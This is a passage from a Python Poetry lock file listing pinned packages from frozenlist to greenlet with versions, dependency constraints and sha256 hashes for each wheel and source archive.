"frozenlist-1.4.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:5833593c25ac59ede40ed4de6d67eb42928cca97f26feea219f21d0ed0959b79"}, {file = "frozenlist-1.4.0-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:fec520865f42e5c7f050c2a79038897b1c7d1595e907a9e08e3353293ffc948e"}, {file = "frozenlist-1.4.0-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:b826d97e4276750beca7c8f0f1a4938892697a6bcd8ec8217b3312dad6982781"}, {file = "frozenlist-1.4.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:ceb6ec0a10c65540421e20ebd29083c50e6d1143278746a4ef6bcf6153171eb8"}, {file = "frozenlist-1.4.0-cp38-cp38-win32.whl", hash = "sha256:2b8bcf994563466db019fab287ff390fffbfdb4f905fc77bc1c1d604b1c689cc"}, {file = "frozenlist-1.4.0-cp38-cp38-win_amd64.whl", hash = "sha256:a6c8097e01886188e5be3e6b14e94ab365f384736aa1fca6a0b9e35bd4a30bc7"}, {file = "frozenlist-1.4.0-cp39-cp39-macosx_10_9_universal2.whl", hash = 
"sha256:6c38721585f285203e4b4132a352eb3daa19121a035f3182e08e437cface44bf"}, {file = "frozenlist-1.4.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:a0c6da9aee33ff0b1a451e867da0c1f47408112b3391dd43133838339e410963"}, {file = "frozenlist-1.4.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:93ea75c050c5bb3d98016b4ba2497851eadf0ac154d88a67d7a6816206f6fa7f"}, {file = "frozenlist-1.4.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f61e2dc5ad442c52b4887f1fdc112f97caeff4d9e6ebe78879364ac59f1663e1"}, {file = "frozenlist-1.4.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:aa384489fefeb62321b238e64c07ef48398fe80f9e1e6afeff22e140e0850eef"}, {file = "frozenlist-1.4.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:10ff5faaa22786315ef57097a279b833ecab1a0bfb07d604c9cbb1c4cdc2ed87"}, {file = "frozenlist-1.4.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:007df07a6e3eb3e33e9a1fe6a9db7af152bbd8a185f9aaa6ece10a3529e3e1c6"}, {file = "frozenlist-1.4.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7f4f399d28478d1f604c2ff9119907af9726aed73680e5ed1ca634d377abb087"}, {file = "frozenlist-1.4.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:c5374b80521d3d3f2ec5572e05adc94601985cc526fb276d0c8574a6d749f1b3"}, {file = "frozenlist-1.4.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:ce31ae3e19f3c902de379cf1323d90c649425b86de7bbdf82871b8a2a0615f3d"}, {file = "frozenlist-1.4.0-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:7211ef110a9194b6042449431e08c4d80c0481e5891e58d429df5899690511c2"}, {file = "frozenlist-1.4.0-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:556de4430ce324c836789fa4560ca62d1591d2538b8ceb0b4f68fb7b2384a27a"}, {file = "frozenlist-1.4.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:7645a8e814a3ee34a89c4a372011dcd817964ce8cb273c8ed6119d706e9613e3"}, {file = "frozenlist-1.4.0-cp39-cp39-win32.whl", hash = "sha256:19488c57c12d4e8095a922f328df3f179c820c212940a498623ed39160bc3c2f"}, {file = "frozenlist-1.4.0-cp39-cp39-win_amd64.whl", hash = "sha256:6221d84d463fb110bdd7619b69cb43878a11d51cbb9394ae3105d082d5199167"}, {file = "frozenlist-1.4.0.tar.gz", hash = "sha256:09163bdf0b2907454042edb19f887c6d33806adc71fbd54afc14908bfdc22251"}, ] [[package]] name = "fsspec" version = "2023.10.0" description = "File-system specification" optional = true python-versions = ">=3.8" files = [ {file = "fsspec-2023.10.0-py3-none-any.whl", hash = "sha256:346a8f024efeb749d2a5fca7ba8854474b1ff9af7c3faaf636a4548781136529"}, {file = "fsspec-2023.10.0.tar.gz", hash = "sha256:330c66757591df346ad3091a53bd907e15348c2ba17d63fd54f5c39c4457d2a5"}, ] [package.extras] abfs = ["adlfs"] adl = ["adlfs"] arrow = ["pyarrow (>=1)"] dask = ["dask", "distributed"] devel = ["pytest", "pytest-cov"] dropbox = ["dropbox", "dropboxdrivefs", "requests"] full = ["adlfs", "aiohttp (!=4.0.0a0,!=4.0.0a1)", "dask", "distributed", "dropbox", "dropboxdrivefs", "fusepy", "gcsfs", "libarchive-c", "ocifs", "panel", "paramiko", "pyarrow (>=1)", "pygit2", "requests", "s3fs", "smbprotocol", "tqdm"] fuse = ["fusepy"] gcs = ["gcsfs"] git = ["pygit2"] github = ["requests"] gs = ["gcsfs"] gui = ["panel"] hdfs = ["pyarrow (>=1)"] http = ["aiohttp (!=4.0.0a0,!=4.0.0a1)", "requests"] libarchive = ["libarchive-c"] oci = ["ocifs"] s3 = ["s3fs"] sftp = ["paramiko"] smb = ["smbprotocol"] ssh = ["paramiko"] tqdm = ["tqdm"] [[package]] name = 
"future" version = "0.18.3" description = "Clean single-source support for Python 3 and 2" optional = true python-versions = ">=2.6, !=3.0.*, !=3.1.*, !=3.2.*" files = [ {file = "future-0.18.3.tar.gz", hash = "sha256:34a17436ed1e96697a86f9de3d15a3b0be01d8bc8de9c1dffd59fb8234ed5307"}, ] [[package]] name = "gast" version = "0.4.0" description = "Python AST that abstracts the underlying Python version" optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" files = [ {file = "gast-0.4.0-py3-none-any.whl", hash = "sha256:b7adcdd5adbebf1adf17378da5ba3f543684dbec47b1cda1f3997e573cd542c4"}, {file = "gast-0.4.0.tar.gz", hash = "sha256:40feb7b8b8434785585ab224d1568b857edb18297e5a3047f1ba012bc83b42c1"}, ] [[package]] name = "geojson" version = "2.5.0" description = "Python bindings and utilities for GeoJSON" optional = true python-versions = "*" files = [ {file = "geojson-2.5.0-py2.py3-none-any.whl", hash = "sha256:ccbd13368dd728f4e4f13ffe6aaf725b6e802c692ba0dde628be475040c534ba"}, {file = "geojson-2.5.0.tar.gz", hash = "sha256:6e4bb7ace4226a45d9c8c8b1348b3fc43540658359f93c3f7e03efa9f15f658a"}, ] [[package]] name = "geomet" version = "0.2.1.post1" description = "GeoJSON <-> WKT/WKB conversion utilities" optional = false python-versions = ">2.6, !=3.3.*, <4" files = [ {file = "geomet-0.2.1.post1-py3-none-any.whl", hash = "sha256:a41a1e336b381416d6cbed7f1745c848e91defaa4d4c1bdc1312732e46ffad2b"}, {file = "geomet-0.2.1.post1.tar.gz", hash = "sha256:91d754f7c298cbfcabd3befdb69c641c27fe75e808b27aa55028605761d17e95"}, ] [package.dependencies] click = "*" six = "*" [[package]] name = "geopandas" version = "0.13.2" description = "Geographic pandas extensions" optional = true python-versions = ">=3.8" files = [ {file = "geopandas-0.13.2-py3-none-any.whl", hash = "sha256:101cfd0de54bcf9e287a55b5ea17ebe0db53a5e25a28bacf100143d0507cabd9"}, {file = "geopandas-0.13.2.tar.gz", hash = "sha256:e5b56d9c20800c77bcc0c914db3f27447a37b23b2cd892be543f5001a694a968"}, ] [package.dependencies] fiona = ">=1.8.19" packaging = "*" pandas = ">=1.1.0" pyproj = ">=3.0.1" shapely = ">=1.7.1" [[package]] name = "gitdb" version = "4.0.11" description = "Git Object Database" optional = true python-versions = ">=3.7" files = [ {file = "gitdb-4.0.11-py3-none-any.whl", hash = "sha256:81a3407ddd2ee8df444cbacea00e2d038e40150acfa3001696fe0dcf1d3adfa4"}, {file = "gitdb-4.0.11.tar.gz", hash = "sha256:bf5421126136d6d0af55bc1e7c1af1c397a34f5b7bd79e776cd3e89785c2b04b"}, ] [package.dependencies] smmap = ">=3.0.1,<6" [[package]] name = "gitpython" version = "3.1.40" description = "GitPython is a Python library used to interact with Git repositories" optional = true python-versions = ">=3.7" files = [ {file = "GitPython-3.1.40-py3-none-any.whl", hash = "sha256:cf14627d5a8049ffbf49915732e5eddbe8134c3bdb9d476e6182b676fc573f8a"}, {file = "GitPython-3.1.40.tar.gz", hash = "sha256:22b126e9ffb671fdd0c129796343a02bf67bf2994b35449ffc9321aa755e18a4"}, ] [package.dependencies] gitdb = ">=4.0.1,<5" [package.extras] test = ["black", "coverage[toml]", "ddt (>=1.1.1,!=1.4.3)", "mock", "mypy", "pre-commit", "pytest", "pytest-cov", "pytest-instafail", "pytest-subtests", "pytest-sugar"] [[package]] name = "google-api-core" version = "1.34.0" description = "Google API client core library" optional = true python-versions = ">=3.7" files = [ {file = "google-api-core-1.34.0.tar.gz", hash = "sha256:6fb380f49d19ee1d09a9722d0379042b7edb06c0112e4796c7a395078a043e71"}, {file = "google_api_core-1.34.0-py3-none-any.whl", hash = 
"sha256:7421474c39d396a74dfa317dddbc69188f2336835f526087c7648f91105e32ff"}, ] [package.dependencies] google-auth = ">=1.25.0,<3.0dev" googleapis-common-protos = ">=1.56.2,<2.0dev" grpcio = {version = ">=1.33.2,<2.0dev", optional = true, markers = "extra == \"grpc\""} grpcio-status = {version = ">=1.33.2,<2.0dev", optional = true, markers = "extra == \"grpc\""} protobuf = ">=3.19.5,<3.20.0 || >3.20.0,<3.20.1 || >3.20.1,<4.0.0dev" requests = ">=2.18.0,<3.0.0dev" [package.extras] grpc = ["grpcio (>=1.33.2,<2.0dev)", "grpcio-status (>=1.33.2,<2.0dev)"] grpcgcp = ["grpcio-gcp (>=0.2.2,<1.0dev)"] grpcio-gcp = ["grpcio-gcp (>=0.2.2,<1.0dev)"] [[package]] name = "google-api-core" version = "2.12.0" description = "Google API client core library" optional = true python-versions = ">=3.7" files = [ {file = "google-api-core-2.12.0.tar.gz", hash = "sha256:c22e01b1e3c4dcd90998494879612c38d0a3411d1f7b679eb89e2abe3ce1f553"}, {file = "google_api_core-2.12.0-py3-none-any.whl", hash = "sha256:ec6054f7d64ad13b41e43d96f735acbd763b0f3b695dabaa2d579673f6a6e160"}, ] [package.dependencies] google-auth = ">=2.14.1,<3.0.dev0" googleapis-common-protos = ">=1.56.2,<2.0.dev0" grpcio = {version = ">=1.33.2,<2.0dev", optional = true, markers = "python_version < \"3.11\" and extra == \"grpc\""} grpcio-status = {version = ">=1.33.2,<2.0.dev0", optional = true, markers = "python_version < \"3.11\" and extra == \"grpc\""} protobuf = ">=3.19.5,<3.20.0 || >3.20.0,<3.20.1 || >3.20.1,<4.21.0 || >4.21.0,<4.21.1 || >4.21.1,<4.21.2 || >4.21.2,<4.21.3 || >4.21.3,<4.21.4 || >4.21.4,<4.21.5 || >4.21.5,<5.0.0.dev0" requests = ">=2.18.0,<3.0.0.dev0" [package.extras] grpc = ["grpcio (>=1.33.2,<2.0dev)", "grpcio (>=1.49.1,<2.0dev)", "grpcio-status (>=1.33.2,<2.0.dev0)", "grpcio-status (>=1.49.1,<2.0.dev0)"] grpcgcp = ["grpcio-gcp (>=0.2.2,<1.0.dev0)"] grpcio-gcp = ["grpcio-gcp (>=0.2.2,<1.0.dev0)"] [[package]] name = "google-api-python-client" version = "2.70.0" description = "Google API Client Library for Python" optional = true python-versions = ">=3.7" files = [ {file = "google-api-python-client-2.70.0.tar.gz", hash = "sha256:262de094d5a30d337f59e66581019fed45b698c078397ac48dd323c0968236e7"}, {file = "google_api_python_client-2.70.0-py2.py3-none-any.whl", hash = "sha256:67da78956f2bf4b763305cd791aeab250878c1f88f1422aaba4682a608b8e5a4"}, ] [package.dependencies] google-api-core = ">=1.31.5,<2.0.dev0 || >2.3.0,<3.0.0dev" google-auth = ">=1.19.0,<3.0.0dev" google-auth-httplib2 = ">=0.1.0" httplib2 = ">=0.15.0,<1dev" uritemplate = ">=3.0.1,<5" [[package]] name = "google-auth" version = "2.23.3" description = "Google Authentication Library" optional = true python-versions = ">=3.7" files = [ {file = "google-auth-2.23.3.tar.gz", hash = "sha256:6864247895eea5d13b9c57c9e03abb49cb94ce2dc7c58e91cba3248c7477c9e3"}, {file = "google_auth-2.23.3-py2.py3-none-any.whl", hash = "sha256:a8f4608e65c244ead9e0538f181a96c6e11199ec114d41f1d7b1bffa96937bda"}, ] [package.dependencies] cachetools = ">=2.0.0,<6.0" pyasn1-modules = ">=0.2.1" rsa = ">=3.1.4,<5" [package.extras] aiohttp = ["aiohttp (>=3.6.2,<4.0.0.dev0)", "requests (>=2.20.0,<3.0.0.dev0)"] enterprise-cert = ["cryptography (==36.0.2)", "pyopenssl (==22.0.0)"] pyopenssl = ["cryptography (>=38.0.3)", "pyopenssl (>=20.0.0)"] reauth = ["pyu2f (>=0.1.5)"] requests = ["requests (>=2.20.0,<3.0.0.dev0)"] [[package]] name = "google-auth-httplib2" version = "0.1.1" description = "Google Authentication Library: httplib2 transport" optional = true python-versions = "*" files = [ {file = 
"google-auth-httplib2-0.1.1.tar.gz", hash = "sha256:c64bc555fdc6dd788ea62ecf7bccffcf497bf77244887a3f3d7a5a02f8e3fc29"}, {file = "google_auth_httplib2-0.1.1-py2.py3-none-any.whl", hash = "sha256:42c50900b8e4dcdf8222364d1f0efe32b8421fb6ed72f2613f12f75cc933478c"}, ] [package.dependencies] google-auth = "*" httplib2 = ">=0.19.0" [[package]] name = "google-auth-oauthlib" version = "0.4.6" description = "Google Authentication Library" optional = true python-versions = ">=3.6" files = [ {file = "google-auth-oauthlib-0.4.6.tar.gz", hash = "sha256:a90a072f6993f2c327067bf65270046384cda5a8ecb20b94ea9a687f1f233a7a"}, {file = "google_auth_oauthlib-0.4.6-py2.py3-none-any.whl", hash = "sha256:3f2a6e802eebbb6fb736a370fbf3b055edcb6b52878bf2f26330b5e041316c73"}, ] [package.dependencies] google-auth = ">=1.0.0" requests-oauthlib = ">=0.7.0" [package.extras] tool = ["click (>=6.0.0)"] [[package]] name = "google-cloud-documentai" version = "2.20.1" description = "Google Cloud Documentai API client library" optional = true python-versions = ">=3.7" files = [ {file = "google-cloud-documentai-2.20.1.tar.gz", hash = "sha256:eba90546c80177bab7ee8aa3f4b7b1f89cf3ce9752032e359a15d0fbf2225fb0"}, {file = "google_cloud_documentai-2.20.1-py2.py3-none-any.whl", hash = "sha256:793a2e59c425655c951055810635798b5ef56fed164e35b2bd521e5c30ab279e"}, ] [package.dependencies] google-api-core = {version = ">=1.34.0,<2.0.dev0 || >=2.11.dev0,<3.0.0dev", extras = ["grpc"]} proto-plus = [ {version = ">=1.22.2,<2.0.0dev", markers = "python_version >= \"3.11\""}, {version = ">=1.22.0,<2.0.0dev", markers = "python_version < \"3.11\""}, ] protobuf = ">=3.19.5,<3.20.0 || >3.20.0,<3.20.1 || >3.20.1,<4.21.0 || >4.21.0,<4.21.1 || >4.21.1,<4.21.2 || >4.21.2,<4.21.3 || >4.21.3,<4.21.4 || >4.21.4,<4.21.5 || >4.21.5,<5.0.0dev" [[package]] name = "google-pasta" version = "0.2.0" description = "pasta is an AST-based Python refactoring library" optional = true python-versions = "*" files = [ {file = "google-pasta-0.2.0.tar.gz", hash = "sha256:c9f2c8dfc8f96d0d5808299920721be30c9eec37f2389f28904f454565c8a16e"}, {file = "google_pasta-0.2.0-py2-none-any.whl", hash = "sha256:4612951da876b1a10fe3960d7226f0c7682cf901e16ac06e473b267a5afa8954"}, {file = "google_pasta-0.2.0-py3-none-any.whl", hash = "sha256:b32482794a366b5366a32c92a9a9201b107821889935a02b3e51f6b432ea84ed"}, ] [package.dependencies] six = "*" [[package]] name = "google-search-results" version = "2.4.2" description = "Scrape and search localized results from Google, Bing, Baidu, Yahoo, Yandex, Ebay, Homedepot, youtube at scale using SerpApi.com" optional = true python-versions = ">=3.5" files = [ {file = "google_search_results-2.4.2.tar.gz", hash = "sha256:603a30ecae2af8e600b22635757a6df275dad4b934f975e67878ccd640b78245"}, ] [package.dependencies] requests = "*" [[package]] name = "googleapis-common-protos" version = "1.61.0" description = "Common protobufs used in Google APIs" optional = true python-versions = ">=3.7" files = [ {file = "googleapis-common-protos-1.61.0.tar.gz", hash = "sha256:8a64866a97f6304a7179873a465d6eee97b7a24ec6cfd78e0f575e96b821240b"}, {file = "googleapis_common_protos-1.61.0-py2.py3-none-any.whl", hash = "sha256:22f1915393bb3245343f6efe87f6fe868532efc12aa26b391b15132e1279f1c0"}, ] [package.dependencies] protobuf = ">=3.19.5,<3.20.0 || >3.20.0,<3.20.1 || >3.20.1,<4.21.1 || >4.21.1,<4.21.2 || >4.21.2,<4.21.3 || >4.21.3,<4.21.4 || >4.21.4,<4.21.5 || >4.21.5,<5.0.0.dev0" [package.extras] grpc = ["grpcio (>=1.44.0,<2.0.0.dev0)"] [[package]] name = "gptcache" version = "0.1.42" 
description = "GPTCache, a powerful caching library that can be used to speed up and lower the cost of chat applications that rely on the LLM service. GPTCache works as a memcache for AIGC applications, similar to how Redis works for traditional applications." optional = true python-versions = ">=3.8.1" files = [ {file = "gptcache-0.1.42-py3-none-any.whl", hash = "sha256:8da93cd9fdc3a1c09aae25b688823b4a5bc28dcfa4522e33617f3f7a9e5b8bb0"}, {file = "gptcache-0.1.42.tar.gz", hash = "sha256:17339c41d992bd47c623c716be3bd915dba2687a0fa52aa4ab4ed9cc7cc2b256"}, ] [package.dependencies] cachetools = "*" numpy = "*" requests = "*" [[package]] name = "gql" version = "3.4.1" description = "GraphQL client for Python" optional = true python-versions = "*" files = [ {file = "gql-3.4.1-py2.py3-none-any.whl", hash = "sha256:315624ca0f4d571ef149d455033ebd35e45c1a13f18a059596aeddcea99135cf"}, {file = "gql-3.4.1.tar.gz", hash = "sha256:11dc5d8715a827f2c2899593439a4f36449db4f0eafa5b1ea63948f8a2f8c545"}, ] [package.dependencies] backoff = ">=1.11.1,<3.0" graphql-core = ">=3.2,<3.3" yarl = ">=1.6,<2.0" [package.extras] aiohttp = ["aiohttp (>=3.7.1,<3.9.0)"] all = ["aiohttp (>=3.7.1,<3.9.0)", "botocore (>=1.21,<2)", "requests (>=2.26,<3)", "requests-toolbelt (>=0.9.1,<1)", "urllib3 (>=1.26,<2)", "websockets (>=10,<11)", "websockets (>=9,<10)"] botocore = ["botocore (>=1.21,<2)"] dev = ["aiofiles", "aiohttp (>=3.7.1,<3.9.0)", "black (==22.3.0)", "botocore (>=1.21,<2)", "check-manifest (>=0.42,<1)", "flake8 (==3.8.1)", "isort (==4.3.21)", "mock (==4.0.2)", "mypy (==0.910)", "parse (==1.15.0)", "pytest (==6.2.5)", "pytest-asyncio (==0.16.0)", "pytest-console-scripts (==1.3.1)", "pytest-cov (==3.0.0)", "requests (>=2.26,<3)", "requests-toolbelt (>=0.9.1,<1)", "sphinx (>=3.0.0,<4)", "sphinx-argparse (==0.2.5)", "sphinx-rtd-theme (>=0.4,<1)", "types-aiofiles", "types-mock", "types-requests", "urllib3 (>=1.26,<2)", "vcrpy (==4.0.2)", "websockets (>=10,<11)", "websockets (>=9,<10)"] requests = ["requests (>=2.26,<3)", "requests-toolbelt (>=0.9.1,<1)", "urllib3 (>=1.26,<2)"] test = ["aiofiles", "aiohttp (>=3.7.1,<3.9.0)", "botocore (>=1.21,<2)", "mock (==4.0.2)", "parse (==1.15.0)", "pytest (==6.2.5)", "pytest-asyncio (==0.16.0)", "pytest-console-scripts (==1.3.1)", "pytest-cov (==3.0.0)", "requests (>=2.26,<3)", "requests-toolbelt (>=0.9.1,<1)", "urllib3 (>=1.26,<2)", "vcrpy (==4.0.2)", "websockets (>=10,<11)", "websockets (>=9,<10)"] test-no-transport = ["aiofiles", "mock (==4.0.2)", "parse (==1.15.0)", "pytest (==6.2.5)", "pytest-asyncio (==0.16.0)", "pytest-console-scripts (==1.3.1)", "pytest-cov (==3.0.0)", "vcrpy (==4.0.2)"] websockets = ["websockets (>=10,<11)", "websockets (>=9,<10)"] [[package]] name = "graphql-core" version = "3.2.3" description = "GraphQL implementation for Python, a port of GraphQL.js, the JavaScript reference implementation for GraphQL." 
optional = true python-versions = ">=3.6,<4" files = [ {file = "graphql-core-3.2.3.tar.gz", hash = "sha256:06d2aad0ac723e35b1cb47885d3e5c45e956a53bc1b209a9fc5369007fe46676"}, {file = "graphql_core-3.2.3-py3-none-any.whl", hash = "sha256:5766780452bd5ec8ba133f8bf287dc92713e3868ddd83aee4faab9fc3e303dc3"}, ] [[package]] name = "greenlet" version = "3.0.0" description = "Lightweight in-process concurrent programming" optional = false python-versions = ">=3.7" files = [ {file = "greenlet-3.0.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:e09dea87cc91aea5500262993cbd484b41edf8af74f976719dd83fe724644cd6"}, {file = "greenlet-3.0.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f47932c434a3c8d3c86d865443fadc1fbf574e9b11d6650b656e602b1797908a"}, {file = "greenlet-3.0.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:bdfaeecf8cc705d35d8e6de324bf58427d7eafb55f67050d8f28053a3d57118c"}, {file = "greenlet-3.0.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:6a68d670c8f89ff65c82b936275369e532772eebc027c3be68c6b87ad05ca695"}, {file = "greenlet-3.0.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:38ad562a104cd41e9d4644f46ea37167b93190c6d5e4048fcc4b80d34ecb278f"}, {file = "greenlet-3.0.0-cp310-cp310-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:02a807b2a58d5cdebb07050efe3d7deaf915468d112dfcf5e426d0564aa3aa4a"}, {file = "greenlet-3.0.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:b1660a15a446206c8545edc292ab5c48b91ff732f91b3d3b30d9a915d5ec4779"}, {file = "greenlet-3.0.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:813720bd57e193391dfe26f4871186cf460848b83df7e23e6bef698a7624b4c9"}, {file = "greenlet-3.0.0-cp310-cp310-win_amd64.whl", hash = "sha256:aa15a2ec737cb609ed48902b45c5e4ff6044feb5dcdfcf6fa8482379190330d7"}, {file = "greenlet-3.0.0-cp310-universal2-macosx_11_0_x86_64.whl", hash = "sha256:7709fd7bb02b31908dc8fd35bfd0a29fc24681d5cc9ac1d64ad07f8d2b7db62f"}, {file = "greenlet-3.0.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:211ef8d174601b80e01436f4e6905aca341b15a566f35a10dd8d1e93f5dbb3b7"}, {file = "greenlet-3.0.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6512592cc49b2c6d9b19fbaa0312124cd4c4c8a90d28473f86f92685cc5fef8e"}, {file = "greenlet-3.0.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:871b0a8835f9e9d461b7fdaa1b57e3492dd45398e87324c047469ce2fc9f516c"}, {file = "greenlet-3.0.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b505fcfc26f4148551826a96f7317e02c400665fa0883fe505d4fcaab1dabfdd"}, {file = "greenlet-3.0.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:123910c58234a8d40eaab595bc56a5ae49bdd90122dde5bdc012c20595a94c14"}, {file = "greenlet-3.0.0-cp311-cp311-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:96d9ea57292f636ec851a9bb961a5cc0f9976900e16e5d5647f19aa36ba6366b"}, {file = "greenlet-3.0.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:0b72b802496cccbd9b31acea72b6f87e7771ccfd7f7927437d592e5c92ed703c"}, {file = "greenlet-3.0.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:527cd90ba3d8d7ae7dceb06fda619895768a46a1b4e423bdb24c1969823b8362"}, {file = "greenlet-3.0.0-cp311-cp311-win_amd64.whl", hash = "sha256:37f60b3a42d8b5499be910d1267b24355c495064f271cfe74bf28b17b099133c"}, {file = "greenlet-3.0.0-cp312-cp312-macosx_10_9_universal2.whl", hash = 
"sha256:1482fba7fbed96ea7842b5a7fc11d61727e8be75a077e603e8ab49d24e234383"}, {file = "greenlet-3.0.0-cp312-cp312-macosx_13_0_arm64.whl", hash = "sha256:be557119bf467d37a8099d91fbf11b2de5eb1fd5fc5b91598407574848dc910f"}, {file = "greenlet-3.0.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:73b2f1922a39d5d59cc0e597987300df3396b148a9bd10b76a058a2f2772fc04"}, {file = "greenlet-3.0.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:d1e22c22f7826096ad503e9bb681b05b8c1f5a8138469b255eb91f26a76634f2"}, {file = "greenlet-3.0.0-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:1d363666acc21d2c204dd8705c0e0457d7b2ee7a76cb16ffc099d6799744ac99"}, {file = "greenlet-3.0.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:334ef6ed8337bd0b58bb0ae4f7f2dcc84c9f116e474bb4ec250a8bb9bd797a66"}, {file = "greenlet-3.0.0-cp312-cp312-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:6672fdde0fd1a60b44fb1751a7779c6db487e42b0cc65e7caa6aa686874e79fb"}, {file = "greenlet-3.0.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:952256c2bc5b4ee8df8dfc54fc4de330970bf5d79253c863fb5e6761f00dda35"}, {file = "greenlet-3.0.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:269d06fa0f9624455ce08ae0179430eea61085e3cf6457f05982b37fd2cefe17"}, {file = "greenlet-3.0.0-cp312-cp312-win_amd64.whl", hash = "sha256:9adbd8ecf097e34ada8efde9b6fec4dd2a903b1e98037adf72d12993a1c80b51"}, {file = "greenlet-3.0.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c6b5ce7f40f0e2f8b88c28e6691ca6806814157ff05e794cdd161be928550f4c"}, {file = "greenlet-3.0.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ecf94aa539e97a8411b5ea52fc6ccd8371be9550c4041011a091eb8b3ca1d810"}, {file = "greenlet-3.0.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:80dcd3c938cbcac986c5c92779db8e8ce51a89a849c135172c88ecbdc8c056b7"}, {file = "greenlet-3.0.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e52a712c38e5fb4fd68e00dc3caf00b60cb65634d50e32281a9d6431b33b4af1"}, {file = "greenlet-3.0.0-cp37-cp37m-manylinux_2_24_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:d5539f6da3418c3dc002739cb2bb8d169056aa66e0c83f6bacae0cd3ac26b423"}, {file = "greenlet-3.0.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:343675e0da2f3c69d3fb1e894ba0a1acf58f481f3b9372ce1eb465ef93cf6fed"}, {file = "greenlet-3.0.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:abe1ef3d780de56defd0c77c5ba95e152f4e4c4e12d7e11dd8447d338b85a625"}, {file = "greenlet-3.0.0-cp37-cp37m-win32.whl", hash = "sha256:e693e759e172fa1c2c90d35dea4acbdd1d609b6936115d3739148d5e4cd11947"}, {file = "greenlet-3.0.0-cp37-cp37m-win_amd64.whl", hash = "sha256:bdd696947cd695924aecb3870660b7545a19851f93b9d327ef8236bfc49be705"}, {file = "greenlet-3.0.0-cp37-universal2-macosx_11_0_x86_64.whl", hash = "sha256:cc3e2679ea13b4de79bdc44b25a0c4fcd5e94e21b8f290791744ac42d34a0353"}, {file = "greenlet-3.0.0-cp38-cp38-macosx_11_0_universal2.whl", hash = "sha256:63acdc34c9cde42a6534518e32ce55c30f932b473c62c235a466469a710bfbf9"}, {file = "greenlet-3.0.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4a1a6244ff96343e9994e37e5b4839f09a0207d35ef6134dce5c20d260d0302c"}, {file = "greenlet-3.0.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b822fab253ac0f330ee807e7485769e3ac85d5eef827ca224feaaefa462dc0d0"}, {file = 
